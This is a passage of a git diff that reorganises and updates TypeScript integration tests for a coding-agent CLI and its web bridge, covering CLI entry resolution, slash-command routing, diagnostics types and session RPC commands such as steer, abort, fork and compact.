+test("resolveGsdCliEntry prefers the source loader for source-dev interactive sessions", (t) => {
+  const packageRoot = makeFixture([
+    "dist/loader.js",
+    "src/loader.ts",
+    "src/resources/extensions/gsd/tests/resolve-ts.mjs",
+  ]);
+
+  t.after(() => { rmSync(packageRoot, { recursive: true, force: true }); });
+
+  const entry = resolveGsdCliEntry({
+    packageRoot,
+    cwd: "/tmp/project-b",
+    execPath: "/custom/node",
+    hostKind: "source-dev",
+    mode: "interactive",
+  });
+
+  assert.deepEqual(entry, {
+    command: "/custom/node",
+    args: [
+      "--import",
+      pathToFileURL(join(packageRoot, "src", "resources", "extensions", "gsd", "tests", "resolve-ts.mjs")).href,
+      "--experimental-strip-types",
+      join(packageRoot, "src", "loader.ts"),
+    ],
+    cwd: "/tmp/project-b",
+  });
+});
+
+test("resolveGsdCliEntry appends rpc arguments for bridge sessions", (t) => {
+  const packageRoot = makeFixture(["dist/loader.js"]);
+
+  t.after(() => { rmSync(packageRoot, { recursive: true, force: true }); });
+
+  const entry = resolveGsdCliEntry({
+    packageRoot,
+    cwd: "/tmp/project-c",
+    execPath: "/custom/node",
+    hostKind: "packaged-standalone",
+    mode: "rpc",
+    sessionDir: "/tmp/.gsd/sessions/project-c",
+  });
+
+  assert.deepEqual(entry, {
+    command: "/custom/node",
+    args: [
+      join(packageRoot, "dist", "loader.js"),
+      "--mode",
+      "rpc",
+      "--continue",
+      "--session-dir",
+      "/tmp/.gsd/sessions/project-c",
+    ],
+    cwd: "/tmp/project-c",
+  });
+});
diff --git a/src/tests/web-command-parity-contract.test.ts b/src/tests/integration/web-command-parity-contract.test.ts
similarity index 98%
rename from src/tests/web-command-parity-contract.test.ts
rename to src/tests/integration/web-command-parity-contract.test.ts
index c21660ab0..96b6e2640 100644
--- a/src/tests/web-command-parity-contract.test.ts
+++ b/src/tests/integration/web-command-parity-contract.test.ts
@@ -3,19 +3,19 @@ import assert from "node:assert/strict"
 import { readFileSync } from "node:fs"
 import { resolve } from "node:path"
 
-const { BUILTIN_SLASH_COMMANDS } = await import("../../packages/pi-coding-agent/src/core/slash-commands.ts")
+const { BUILTIN_SLASH_COMMANDS } = await import("../../../packages/pi-coding-agent/src/core/slash-commands.ts")
 const {
   dispatchBrowserSlashCommand,
   getBrowserSlashCommandTerminalNotice,
-} = await import("../../web/lib/browser-slash-command-dispatch.ts")
+} = await import("../../../web/lib/browser-slash-command-dispatch.ts")
 const {
   applyCommandSurfaceActionResult,
   createInitialCommandSurfaceState,
   openCommandSurfaceState,
   setCommandSurfacePending,
   surfaceOutcomeToOpenRequest,
-} = await import("../../web/lib/command-surface-contract.ts")
-const gsdExtension = await import("../resources/extensions/gsd/index.ts")
+} = await import("../../../web/lib/command-surface-contract.ts")
+const gsdExtension = await import("../../resources/extensions/gsd/index.ts")
 
 const EXPECTED_BUILTIN_OUTCOMES = new Map<string, "rpc" | "surface" | "reject">([
   ["settings", "surface"],
@@ -39,11 +39,12 @@ const EXPECTED_BUILTIN_OUTCOMES = new Map<string, "rpc" | "surface" | "reject">(
   ["reload", "reject"],
   ["thinking", "surface"],
   ["edit-mode", "reject"],
+  ["terminal", "reject"],
   ["quit", "reject"],
 ])
 
 const BUILTIN_DESCRIPTIONS = new Map(BUILTIN_SLASH_COMMANDS.map((command) => [command.name, command.description]))
-const DEFERRED_BROWSER_REJECTS = ["share", "copy", "changelog", "hotkeys", "tree", "provider", "reload", "edit-mode", "quit"] as const
+const DEFERRED_BROWSER_REJECTS = ["share", "copy", "changelog", "hotkeys", "tree", "provider", "reload", "edit-mode", "terminal", "quit"] as const
 
 async function collectRegisteredGsdCommandRoots(): Promise<string[]> {
   const commands = new Map<string, unknown>()
@@ -679,7 +680,7 @@ test("surface action state keeps compaction summaries inspectable", () => {
 })
 
 test("command-surface session affordances use the shared store action path", () => {
-  const commandSurfacePath = resolve(import.meta.dirname, "../../web/components/gsd/command-surface.tsx")
+  const commandSurfacePath = resolve(import.meta.dirname, "../../../web/components/gsd/command-surface.tsx")
   const commandSurfaceSource = readFileSync(commandSurfacePath, "utf-8")
 
   assert.match(
diff --git a/src/tests/web-continuity-contract.test.ts b/src/tests/integration/web-continuity-contract.test.ts
similarity index 100%
rename from src/tests/web-continuity-contract.test.ts
rename to src/tests/integration/web-continuity-contract.test.ts
diff --git a/src/tests/integration/web-dashboard-rtk-contract.test.ts b/src/tests/integration/web-dashboard-rtk-contract.test.ts
new file mode 100644
index 000000000..08c1e18fd
--- /dev/null
+++ b/src/tests/integration/web-dashboard-rtk-contract.test.ts
@@ -0,0 +1,21 @@
+import test from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join } from "node:path";
+
+const dashboardPath = join(process.cwd(), "web", "components", "gsd", "dashboard.tsx");
+const source = readFileSync(dashboardPath, "utf-8");
+
+test("dashboard gates RTK Saved metric card on rtkEnabled", () => {
+  assert.match(source, /rtkEnabled && \(/, "dashboard should gate the RTK card on rtkEnabled");
+  assert.match(source, /label="RTK Saved"/, "dashboard should contain an RTK Saved card (gated)");
+});
+
+test("dashboard reads rtkEnabled from live auto state", () => {
+  assert.match(source, /const rtkEnabled = auto\?\.rtkEnabled === true/, "dashboard should derive rtkEnabled from the live auto payload");
+});
+
+test("dashboard reads RTK savings from live auto state", () => {
+  assert.match(source, /const rtkSavings = auto\?\.rtkSavings \?\? null/, "dashboard should source RTK savings from the live auto payload");
+  assert.doesNotMatch(source, /\/api\/rtk-savings/, "dashboard should not fetch RTK savings through a dedicated API route");
+});
diff --git a/src/tests/web-diagnostics-contract.test.ts b/src/tests/integration/web-diagnostics-contract.test.ts
similarity index 96%
rename from src/tests/web-diagnostics-contract.test.ts
rename to src/tests/integration/web-diagnostics-contract.test.ts
index 633dec3c4..eb698f3ca 100644
--- a/src/tests/web-diagnostics-contract.test.ts
+++ b/src/tests/integration/web-diagnostics-contract.test.ts
@@ -25,18 +25,18 @@ import type {
   SkillHealthReport,
   SkillHealthEntry,
   SkillHealSuggestion,
-} from "../../web/lib/diagnostics-types.ts"
+} from "../../../web/lib/diagnostics-types.ts"
 
 const {
   createInitialCommandSurfaceState,
   commandSurfaceSectionForRequest,
-} = await import("../../web/lib/command-surface-contract.ts")
+} = await import("../../../web/lib/command-surface-contract.ts")
 
 const {
   dispatchBrowserSlashCommand,
-} = await import("../../web/lib/browser-slash-command-dispatch.ts")
+} = await import("../../../web/lib/browser-slash-command-dispatch.ts")
 
-const { GSDWorkspaceStore } = await import("../../web/lib/gsd-workspace-store.tsx")
+const { GSDWorkspaceStore } = await import("../../../web/lib/gsd-workspace-store.tsx")
 
 // ─── Block 1: Type exports (R103, R104, R105) ───────────────────────────────
 
@@ -69,6 +69,8 @@ describe("diagnostics type exports", () => {
       unitTraces: [],
       completedKeyCount: 0,
       metrics: null,
+      journalSummary: null,
+      activityLogMeta: null,
     }
     assert.equal(typeof report.gsdVersion, "string")
     assert.equal(typeof report.timestamp, "string")
@@ -79,6 +81,8 @@ describe("diagnostics type exports", () => {
     assert.equal(typeof report.doctorIssueCount, "number")
     assert.equal(typeof report.unitTraceCount, "number")
     assert.equal(typeof report.completedKeyCount, "number")
+    assert.equal(report.journalSummary, null)
+    assert.equal(report.activityLogMeta, null)
   })
 
   it("ForensicMetricsSummary has required fields", () => {
diff --git a/src/tests/web-live-interaction-contract.test.ts b/src/tests/integration/web-live-interaction-contract.test.ts
similarity index 74%
rename from src/tests/web-live-interaction-contract.test.ts
rename to src/tests/integration/web-live-interaction-contract.test.ts
index 432c7d238..5e288b69f 100644
--- a/src/tests/web-live-interaction-contract.test.ts
+++ b/src/tests/integration/web-live-interaction-contract.test.ts
@@ -8,11 +8,11 @@ import { PassThrough } from "node:stream";
 import { StringDecoder } from "node:string_decoder";
 
 const repoRoot = process.cwd();
-const bridge = await import("../web/bridge-service.ts");
-const onboarding = await import("../web/onboarding-service.ts");
+const bridge = await import("../../web/bridge-service.ts");
+const onboarding = await import("../../web/onboarding-service.ts");
 const { AuthStorage } = await import("@gsd/pi-coding-agent");
-const commandRoute = await import("../../web/app/api/session/command/route.ts");
-const eventsRoute = await import("../../web/app/api/session/events/route.ts");
+const commandRoute = await import("../../../web/app/api/session/command/route.ts");
+const eventsRoute = await import("../../../web/app/api/session/events/route.ts");
 
 // ---------------------------------------------------------------------------
 // Test infrastructure (reused from web-bridge-contract.test.ts)
@@ -373,7 +373,7 @@ function routeEvent(state: MinimalLiveState, event: any): MinimalLiveState {
 // Tests
 // ---------------------------------------------------------------------------
 
-test("(a) SSE emits extension_ui_request with method 'select' → typed payload with options and allowMultiple", async () => {
+test("(a) SSE emits extension_ui_request with method 'select' → typed payload with options and allowMultiple", async (t) => {
   const fixture = makeWorkspaceFixture();
   const sessionPath = createSessionFile(fixture.projectCwd, fixture.sessionsDir, "sess-ui", "UI Session");
   const harness = createHarness((command, current) => {
@@ -392,46 +392,46 @@ test("(a) SSE emits extension_ui_request with method 'select' → typed payload
 
   setupBridge(harness, fixture);
 
-  try {
-    const controller = new AbortController();
-    const response = await eventsRoute.GET(
-      new Request("http://localhost/api/session/events", { signal: controller.signal }),
-    );
-
-    harness.emit({
-      type: "extension_ui_request",
-      id: "req-select-1",
-      method: "select",
-      title: "Choose a file",
-      options: ["file-a.ts", "file-b.ts", "file-c.ts"],
-      allowMultiple: true,
-    });
-
-    const events = await readSseEvents(response, 2); // bridge_status + the UI request
-    controller.abort();
-    await waitForMicrotasks();
-
-    const uiEvent = events.find((e) => e.type === "extension_ui_request");
-    assert.ok(uiEvent, "extension_ui_request event received via SSE");
-    assert.equal(uiEvent.id, "req-select-1");
-    assert.equal(uiEvent.method, "select");
-    assert.equal(uiEvent.title, "Choose a file");
-    assert.deepEqual(uiEvent.options, ["file-a.ts", "file-b.ts", "file-c.ts"]);
-    assert.equal(uiEvent.allowMultiple, true);
-
-    // Verify store routing: select is a blocking method → should queue
-    let state = createMinimalLiveState();
-    state = routeEvent(state, uiEvent);
-    assert.equal(state.pendingUiRequests.length, 1);
-    assert.equal(state.pendingUiRequests[0].id, "req-select-1");
-    assert.equal(state.pendingUiRequests[0].method, "select");
-    assert.deepEqual(state.pendingUiRequests[0].options, ["file-a.ts", "file-b.ts", "file-c.ts"]);
-    assert.equal(state.pendingUiRequests[0].allowMultiple, true);
-  } finally {
+  t.after(async () => {
     await bridge.resetBridgeServiceForTests();
     onboarding.resetOnboardingServiceForTests();
     fixture.cleanup();
-  }
+  });
+
+  const controller = new AbortController();
+  const response = await eventsRoute.GET(
+    new Request("http://localhost/api/session/events", { signal: controller.signal }),
+  );
+
+  harness.emit({
+    type: "extension_ui_request",
+    id: "req-select-1",
+    method: "select",
+    title: "Choose a file",
+    options: ["file-a.ts", "file-b.ts", "file-c.ts"],
+    allowMultiple: true,
+  });
+
+  const events = await readSseEvents(response, 2); // bridge_status + the UI request
+  controller.abort();
+  await waitForMicrotasks();
+
+  const uiEvent = events.find((e) => e.type === "extension_ui_request");
+  assert.ok(uiEvent, "extension_ui_request event received via SSE");
+  assert.equal(uiEvent.id, "req-select-1");
+  assert.equal(uiEvent.method, "select");
+  assert.equal(uiEvent.title, "Choose a file");
+  assert.deepEqual(uiEvent.options, ["file-a.ts", "file-b.ts", "file-c.ts"]);
+  assert.equal(uiEvent.allowMultiple, true);
+
+  // Verify store routing: select is a blocking method → should queue
+  let state = createMinimalLiveState();
+  state = routeEvent(state, uiEvent);
+  assert.equal(state.pendingUiRequests.length, 1);
+  assert.equal(state.pendingUiRequests[0].id, "req-select-1");
+  assert.equal(state.pendingUiRequests[0].method, "select");
+  assert.deepEqual(state.pendingUiRequests[0].options, ["file-a.ts", "file-b.ts", "file-c.ts"]);
+  assert.equal(state.pendingUiRequests[0].allowMultiple, true);
 });
 
 test("(b) Multiple concurrent UI requests queue correctly keyed by id", async () => {
@@ -480,7 +480,7 @@ test("(b) Multiple concurrent UI requests queue correctly keyed by id", async ()
   assert.equal(state.pendingUiRequests[3].prefill, "initial text");
 });
 
-test("(c) Responding to a UI request posts extension_ui_response with correct id and value to the bridge", async () => {
+test("(c) Responding to a UI request posts extension_ui_response with correct id and value to the bridge", async (t) => {
   const fixture = makeWorkspaceFixture();
   const sessionPath = createSessionFile(fixture.projectCwd, fixture.sessionsDir, "sess-respond", "Respond Session");
   const harness = createHarness((command, current) => {
@@ -499,33 +499,33 @@ test("(c) Responding to a UI request posts extension_ui_response with correct id
 
   setupBridge(harness, fixture);
 
-  try {
-    // Post an extension_ui_response via the command route
-    const response = await commandRoute.POST(
-      new Request("http://localhost/api/session/command", {
-        method: "POST",
-        body: JSON.stringify({ type: "extension_ui_response", id: "req-42", value: "option-b" }),
-      }),
-    );
-
-    // extension_ui_response returns { ok: true } (202) because it's fire-and-forget
-    assert.equal(response.status, 202);
-
-    await waitForMicrotasks();
-
-    // Verify the command was written to the bridge's stdin
-    const uiResponseCmd = harness.commands.find((c) => c.type === "extension_ui_response");
-    assert.ok(uiResponseCmd, "extension_ui_response was sent to the bridge");
-    assert.equal(uiResponseCmd.id, "req-42");
-    assert.equal(uiResponseCmd.value, "option-b");
-  } finally {
+  t.after(async () => {
     await bridge.resetBridgeServiceForTests();
     onboarding.resetOnboardingServiceForTests();
     fixture.cleanup();
-  }
+  });
+
+  // Post an extension_ui_response via the command route
+  const response = await commandRoute.POST(
+    new Request("http://localhost/api/session/command", {
+      method: "POST",
+      body: JSON.stringify({ type: "extension_ui_response", id: "req-42", value: "option-b" }),
+    }),
+  );
+
+  // extension_ui_response returns { ok: true } (202) because it's fire-and-forget
+  assert.equal(response.status, 202);
+
+  await waitForMicrotasks();
+
+  // Verify the command was written to the bridge's stdin
+  const uiResponseCmd = harness.commands.find((c) => c.type === "extension_ui_response");
+  assert.ok(uiResponseCmd, "extension_ui_response was sent to the bridge");
+  assert.equal(uiResponseCmd.id, "req-42");
+  assert.equal(uiResponseCmd.value, "option-b");
 });
 
-test("(d) Dismissing a UI request posts cancelled: true and removes from pending", async () => {
+test("(d) Dismissing a UI request posts cancelled: true and removes from pending", async (t) => {
   const fixture = makeWorkspaceFixture();
   const sessionPath = createSessionFile(fixture.projectCwd, fixture.sessionsDir, "sess-dismiss", "Dismiss Session");
   const harness = createHarness((command, current) => {
@@ -543,48 +543,48 @@ test("(d) Dismissing a UI request posts cancelled: true and removes from pending
 
   setupBridge(harness, fixture);
 
-  try {
-    // Post a cancel response
-    const response = await commandRoute.POST(
-      new Request("http://localhost/api/session/command", {
-        method: "POST",
-        body: JSON.stringify({ type: "extension_ui_response", id: "req-99", cancelled: true }),
-      }),
-    );
-
-    assert.equal(response.status, 202);
-    await waitForMicrotasks();
-
-    const cancelCmd = harness.commands.find((c) => c.type === "extension_ui_response" && c.cancelled === true);
-    assert.ok(cancelCmd, "cancellation extension_ui_response was sent to the bridge");
-    assert.equal(cancelCmd.id, "req-99");
-    assert.equal(cancelCmd.cancelled, true);
-
-    // Verify store routing: removing from pending queue
-    let state = createMinimalLiveState();
-    state = routeEvent(state, {
-      type: "extension_ui_request",
-      id: "req-99",
-      method: "confirm",
-      title: "Confirm?",
-      message: "Really?",
-    });
-    assert.equal(state.pendingUiRequests.length, 1);
-
-    // Simulate removal (mirrors store's dismissUiRequest behavior)
-    state = {
-      ...state,
-      pendingUiRequests: state.pendingUiRequests.filter((r: any) => r.id !== "req-99"),
-    };
-    assert.equal(state.pendingUiRequests.length, 0);
-  } finally {
+  t.after(async () => {
     await bridge.resetBridgeServiceForTests();
     onboarding.resetOnboardingServiceForTests();
     fixture.cleanup();
-  }
+  });
+
+  // Post a cancel response
+  const response = await commandRoute.POST(
+    new Request("http://localhost/api/session/command", {
+      method: "POST",
+      body: JSON.stringify({ type: "extension_ui_response", id: "req-99", cancelled: true }),
+    }),
+  );
+
+  assert.equal(response.status, 202);
+  await waitForMicrotasks();
+
+  const cancelCmd = harness.commands.find((c) => c.type === "extension_ui_response" && c.cancelled === true);
+  assert.ok(cancelCmd, "cancellation extension_ui_response was sent to the bridge");
+  assert.equal(cancelCmd.id, "req-99");
+  assert.equal(cancelCmd.cancelled, true);
+
+  // Verify store routing: removing from pending queue
+  let state = createMinimalLiveState();
+  state = routeEvent(state, {
+    type: "extension_ui_request",
+    id: "req-99",
+    method: "confirm",
+    title: "Confirm?",
+    message: "Really?",
+  });
+  assert.equal(state.pendingUiRequests.length, 1);
+
+  // Simulate removal (mirrors store's dismissUiRequest behavior)
+  state = {
+    ...state,
+    pendingUiRequests: state.pendingUiRequests.filter((r: any) => r.id !== "req-99"),
+  };
+  assert.equal(state.pendingUiRequests.length, 0);
 });
 
-test("(e) SSE emits message_update with text delta → streamingAssistantText accumulates", async () => {
+test("(e) SSE emits message_update with text delta → streamingAssistantText accumulates", async (t) => {
   let state = createMinimalLiveState();
 
   state = routeEvent(state, {
@@ -625,31 +625,31 @@ test("(e) SSE emits message_update with text delta → streamingAssistantText ac
 
   setupBridge(harness, fixture);
 
-  try {
-    const controller = new AbortController();
-    const response = await eventsRoute.GET(
-      new Request("http://localhost/api/session/events", { signal: controller.signal }),
-    );
-
-    harness.emit({
-      type: "message_update",
-      message: { role: "assistant", content: [] },
-      assistantMessageEvent: { type: "text_delta", delta: "streamed text", contentIndex: 0, partial: {} },
-    });
-
-    const events = await readSseEvents(response, 2); // bridge_status + message_update
-    controller.abort();
-    await waitForMicrotasks();
-
-    const msgEvent = events.find((e) => e.type === "message_update");
-    assert.ok(msgEvent, "message_update event received via SSE");
-    assert.equal(msgEvent.assistantMessageEvent.type, "text_delta");
-    assert.equal(msgEvent.assistantMessageEvent.delta, "streamed text");
-  } finally {
+  t.after(async () => {
     await bridge.resetBridgeServiceForTests();
     onboarding.resetOnboardingServiceForTests();
     fixture.cleanup();
-  }
+  });
+
+  const controller = new AbortController();
+  const response = await eventsRoute.GET(
+    new Request("http://localhost/api/session/events", { signal: controller.signal }),
+  );
+
+  harness.emit({
+    type: "message_update",
+    message: { role: "assistant", content: [] },
+    assistantMessageEvent: { type: "text_delta", delta: "streamed text", contentIndex: 0, partial: {} },
+  });
+
+  const events = await readSseEvents(response, 2); // bridge_status + message_update
+  controller.abort();
+  await waitForMicrotasks();
+
+  const msgEvent = events.find((e) => e.type === "message_update");
+  assert.ok(msgEvent, "message_update event received via SSE");
+  assert.equal(msgEvent.assistantMessageEvent.type, "text_delta");
+  assert.equal(msgEvent.assistantMessageEvent.delta, "streamed text");
 });
 
 test("(f) agent_end moves streaming text to transcript and resets streaming text", async () => {
@@ -813,7 +813,7 @@ test("(g-2) tool_execution_start/end update activeToolExecution", async () => {
   assert.equal(state.activeToolExecution, null);
 });
 
-test("(h) steer and abort commands post the correct RPC command type", async () => {
+test("(h) steer and abort commands post the correct RPC command type", async (t) => {
   const fixture = makeWorkspaceFixture();
   const sessionPath = createSessionFile(fixture.projectCwd, fixture.sessionsDir, "sess-steer", "Steer Session");
   const harness = createHarness((command, current) => {
@@ -853,43 +853,43 @@ test("(h) steer and abort commands post the correct RPC command type", async ()
 
   setupBridge(harness, fixture);
 
-  try {
-    // Send steer command
-    const steerResponse = await commandRoute.POST(
-      new Request("http://localhost/api/session/command", {
-        method: "POST",
-        body: JSON.stringify({ type: "steer", message: "focus on the login flow" }),
-      }),
-    );
-    assert.equal(steerResponse.status, 200);
-    const steerBody = await steerResponse.json() as any;
-    assert.equal(steerBody.success, true);
-    assert.equal(steerBody.command, "steer");
-
-    // Verify steer command reached the bridge with the correct shape
-    const steerCmd = harness.commands.find((c) => c.type === "steer");
-    assert.ok(steerCmd, "steer command was sent to the bridge");
-    assert.equal(steerCmd.message, "focus on the login flow");
-
-    // Send abort command
-    const abortResponse = await commandRoute.POST(
-      new Request("http://localhost/api/session/command", {
-        method: "POST",
-        body: JSON.stringify({ type: "abort" }),
-      }),
-    );
-    assert.equal(abortResponse.status, 200);
-    const abortBody = await abortResponse.json() as any;
-    assert.equal(abortBody.success, true);
-    assert.equal(abortBody.command, "abort");
-
-    const abortCmd = harness.commands.find((c) => c.type === "abort");
-    assert.ok(abortCmd, "abort command was sent to the bridge");
-  } finally {
+  t.after(async () => {
     await bridge.resetBridgeServiceForTests();
     onboarding.resetOnboardingServiceForTests();
     fixture.cleanup();
-  }
+  });
+
+  // Send steer command
+  const steerResponse = await commandRoute.POST(
+    new Request("http://localhost/api/session/command", {
+      method: "POST",
+      body: JSON.stringify({ type: "steer", message: "focus on the login flow" }),
+    }),
+  );
+  assert.equal(steerResponse.status, 200);
+  const steerBody = await steerResponse.json() as any;
+  assert.equal(steerBody.success, true);
+  assert.equal(steerBody.command, "steer");
+
+  // Verify steer command reached the bridge with the correct shape
+  const steerCmd = harness.commands.find((c) => c.type === "steer");
+  assert.ok(steerCmd, "steer command was sent to the bridge");
+  assert.equal(steerCmd.message, "focus on the login flow");
+
+  // Send abort command
+  const abortResponse = await commandRoute.POST(
+    new Request("http://localhost/api/session/command", {
+      method: "POST",
+      body: JSON.stringify({ type: "abort" }),
+    }),
+  );
+  assert.equal(abortResponse.status, 200);
+  const abortBody = await abortResponse.json() as any;
+  assert.equal(abortBody.success, true);
+  assert.equal(abortBody.command, "abort");
+
+  const abortCmd = harness.commands.find((c) => c.type === "abort");
+  assert.ok(abortCmd, "abort command was sent to the bridge");
 });
 
 test("(failure-path) UI response errors are visible as lastClientError and pending requests persist on failure", async () => {
@@ -920,7 +920,7 @@ test("(failure-path) UI response errors are visible as lastClientError and pendi
   assert.equal(successState.pendingUiRequests.length, 0, "request removed on success");
 });
 
-test("(session-controls) browser session RPCs round-trip through /api/session/command", async () => {
+test("(session-controls) browser session RPCs round-trip through /api/session/command", async (t) => {
   const fixture = makeWorkspaceFixture();
   const activeSessionPath = createSessionFile(fixture.projectCwd, fixture.sessionsDir, "sess-session", "Session Surface");
   const nextSessionPath = createSessionFile(fixture.projectCwd, fixture.sessionsDir, "sess-next", "Next Session");
@@ -1036,85 +1036,85 @@ test("(session-controls) browser session RPCs round-trip through /api/session/co
 
   setupBridge(harness, fixture);
 
-  try {
-    const sessionResponse = await commandRoute.POST(
-      new Request("http://localhost/api/session/command", {
-        method: "POST",
-        body: JSON.stringify({ type: "get_session_stats" }),
-      }),
-    );
-    assert.equal(sessionResponse.status, 200);
-    const sessionBody = await sessionResponse.json() as any;
-    assert.equal(sessionBody.success, true);
-    assert.equal(sessionBody.command, "get_session_stats");
-    assert.equal(sessionBody.data.sessionId, "sess-session");
-    assert.equal(sessionBody.data.tokens.total, 4600);
-
-    const exportResponse = await commandRoute.POST(
-      new Request("http://localhost/api/session/command", {
-        method: "POST",
-        body: JSON.stringify({ type: "export_html", outputPath: exportPath }),
-      }),
-    );
-    assert.equal(exportResponse.status, 200);
-    const exportBody = await exportResponse.json() as any;
-    assert.equal(exportBody.success, true);
-    assert.equal(exportBody.data.path, exportPath);
-
-    const switchResponse = await commandRoute.POST(
-      new Request("http://localhost/api/session/command", {
-        method: "POST",
-        body: JSON.stringify({ type: "switch_session", sessionPath: nextSessionPath }),
-      }),
-    );
-    assert.equal(switchResponse.status, 200);
-    const switchBody = await switchResponse.json() as any;
-    assert.equal(switchBody.success, true);
-    assert.equal(switchBody.data.cancelled, false);
-
-    const forkMessagesResponse = await commandRoute.POST(
-      new Request("http://localhost/api/session/command", {
-        method: "POST",
-        body: JSON.stringify({ type: "get_fork_messages" }),
-      }),
-    );
-    assert.equal(forkMessagesResponse.status, 200);
-    const forkMessagesBody = await forkMessagesResponse.json() as any;
-    assert.equal(forkMessagesBody.success, true);
-    assert.deepEqual(forkMessagesBody.data.messages, forkMessages);
-
-    const forkResponse = await commandRoute.POST(
-      new Request("http://localhost/api/session/command", {
-        method: "POST",
-        body: JSON.stringify({ type: "fork", entryId: "entry-2" }),
-      }),
-    );
-    assert.equal(forkResponse.status, 200);
-    const forkBody = await forkResponse.json() as any;
-    assert.equal(forkBody.success, true);
-    assert.equal(forkBody.data.cancelled, false);
-    assert.equal(forkBody.data.text, "Fix the slash-command dispatcher");
-
-    const compactResponse = await commandRoute.POST(
-      new Request("http://localhost/api/session/command", {
-        method: "POST",
-        body: JSON.stringify({ type: "compact", customInstructions: "Preserve blockers and current task state" }),
-      }),
-    );
-    assert.equal(compactResponse.status, 200);
-    const compactBody = await compactResponse.json() as any;
-    assert.equal(compactBody.success, true);
-    assert.equal(compactBody.data.summary, "Compacted summary");
-    assert.equal(compactBody.data.tokensBefore, 14200);
-
-    assert.deepEqual(
-      harness.commands.filter((command) => command.type !== "get_state").map((command) => command.type),
-      ["get_session_stats", "export_html", "switch_session", "get_fork_messages", "fork", "compact"],
-      "browser session controls should hit the live command route with the expected RPC sequence",
-    );
-  } finally {
+  t.after(async () => {
     await bridge.resetBridgeServiceForTests();
     onboarding.resetOnboardingServiceForTests();
     fixture.cleanup();
-  }
+  });
+
+  const sessionResponse = await commandRoute.POST(
+    new Request("http://localhost/api/session/command", {
+      method: "POST",
+      body: JSON.stringify({ type: "get_session_stats" }),
+    }),
+  );
+  assert.equal(sessionResponse.status, 200);
+  const sessionBody = await sessionResponse.json() as any;
+  assert.equal(sessionBody.success, true);
+  assert.equal(sessionBody.command, "get_session_stats");
+  assert.equal(sessionBody.data.sessionId, "sess-session");
+  assert.equal(sessionBody.data.tokens.total, 4600);
+
+  const exportResponse = await commandRoute.POST(
+    new Request("http://localhost/api/session/command", {
+      method: "POST",
+      body: JSON.stringify({ type: "export_html", outputPath: exportPath }),
+    }),
+  );
+  assert.equal(exportResponse.status, 200);
+  const exportBody = await exportResponse.json() as any;
+  assert.equal(exportBody.success, true);
+  assert.equal(exportBody.data.path, exportPath);
+
+  const switchResponse = await commandRoute.POST(
+    new Request("http://localhost/api/session/command", {
+      method: "POST",
+      body: JSON.stringify({ type: "switch_session", sessionPath: nextSessionPath }),
+    }),
+  );
+  assert.equal(switchResponse.status, 200);
+  const switchBody = await switchResponse.json() as any;
+  assert.equal(switchBody.success, true);
+  assert.equal(switchBody.data.cancelled, false);
+
+  const forkMessagesResponse = await commandRoute.POST(
+    new Request("http://localhost/api/session/command", {
+      method: "POST",
+      body: JSON.stringify({ type: "get_fork_messages" }),
+    }),
+  );
+  assert.equal(forkMessagesResponse.status, 200);
+  const forkMessagesBody = await forkMessagesResponse.json() as any;
+  assert.equal(forkMessagesBody.success, true);
+  assert.deepEqual(forkMessagesBody.data.messages, forkMessages);
+
+  const forkResponse = await commandRoute.POST(
+    new Request("http://localhost/api/session/command", {
+      method: "POST",
+      body: JSON.stringify({ type: "fork", entryId: "entry-2" }),
+    }),
+  );
+  assert.equal(forkResponse.status, 200);
+  const forkBody = await forkResponse.json() as any;
+  assert.equal(forkBody.success, true);
+  assert.equal(forkBody.data.cancelled, false);
+  assert.equal(forkBody.data.text, "Fix the slash-command dispatcher");
+
+  const compactResponse = await commandRoute.POST(
+    new Request("http://localhost/api/session/command", {
+      method: "POST",
+      body: JSON.stringify({ type: "compact", customInstructions: "Preserve blockers and current task state" }),
+    }),
+  );
+  assert.equal(compactResponse.status, 200);
+  const compactBody = await compactResponse.json() as any;
+  assert.equal(compactBody.success, true);
+  assert.equal(compactBody.data.summary, "Compacted summary");
+  assert.equal(compactBody.data.tokensBefore, 14200);
+
+  assert.deepEqual(
+    harness.commands.filter((command) => command.type !== "get_state").map((command) => command.type),
+    ["get_session_stats", "export_html", "switch_session", "get_fork_messages", "fork", "compact"],
+    "browser session controls should hit the live command route with the expected RPC sequence",
+  );
 });
diff --git a/src/tests/web-live-state-contract.test.ts b/src/tests/integration/web-live-state-contract.test.ts
similarity index 57%
rename from src/tests/web-live-state-contract.test.ts
rename to src/tests/integration/web-live-state-contract.test.ts
index 0edf91425..bed3b44c2 100644
--- a/src/tests/web-live-state-contract.test.ts
+++ b/src/tests/integration/web-live-state-contract.test.ts
@@ -8,13 +8,13 @@ import { PassThrough } from "node:stream";
 import { StringDecoder } from "node:string_decoder";
 
 const repoRoot = process.cwd();
-const bridge = await import("../web/bridge-service.ts");
-const onboarding = await import("../web/onboarding-service.ts");
+const bridge = await import("../../web/bridge-service.ts");
+const onboarding = await import("../../web/onboarding-service.ts");
 const { AuthStorage } = await import("@gsd/pi-coding-agent");
-const commandRoute = await import("../../web/app/api/session/command/route.ts");
-const manageRoute = await import("../../web/app/api/session/manage/route.ts");
-const eventsRoute = await import("../../web/app/api/session/events/route.ts");
-const liveStateRoute = await import("../../web/app/api/live-state/route.ts");
+const commandRoute = await import("../../../web/app/api/session/command/route.ts");
+const manageRoute = await import("../../../web/app/api/session/manage/route.ts");
+const eventsRoute = await import("../../../web/app/api/session/events/route.ts");
+const liveStateRoute = await import("../../../web/app/api/live-state/route.ts");
 
 class FakeRpcChild extends EventEmitter {
   stdin = new PassThrough();
@@ -355,7 +355,7 @@ async function readSseEventsUntil(
   throw new Error("Timed out waiting for the expected SSE contract events");
 }
 
-test("/api/session/events exposes explicit live_state_invalidation events for agent and auto recovery boundaries", async () => {
+test("/api/session/events exposes explicit live_state_invalidation events for agent and auto recovery boundaries", async (t) => {
   const fixture = makeWorkspaceFixture();
   const sessionPath = createSessionFile(
     fixture.projectCwd,
@@ -381,55 +381,58 @@ test("/api/session/events exposes explicit live_state_invalidation events for ag
 
   setupBridge(harness, fixture);
 
-  try {
-    const controller = new AbortController();
-    const response = await eventsRoute.GET(
-      new Request("http://localhost/api/session/events", { signal: controller.signal }),
-    );
-
-    harness.emit({ type: "agent_end" });
-    harness.emit({ type: "auto_retry_start", attempt: 1, maxAttempts: 3, delayMs: 250, errorMessage: "retry me" });
-    harness.emit({ type: "auto_retry_end", success: false, attempt: 1, finalError: "still failing" });
-    harness.emit({ type: "auto_compaction_start", reason: "threshold" });
-    harness.emit({ type: "auto_compaction_end", result: undefined, aborted: false, willRetry: false });
-
-    const events = await readSseEventsUntil(
-      response,
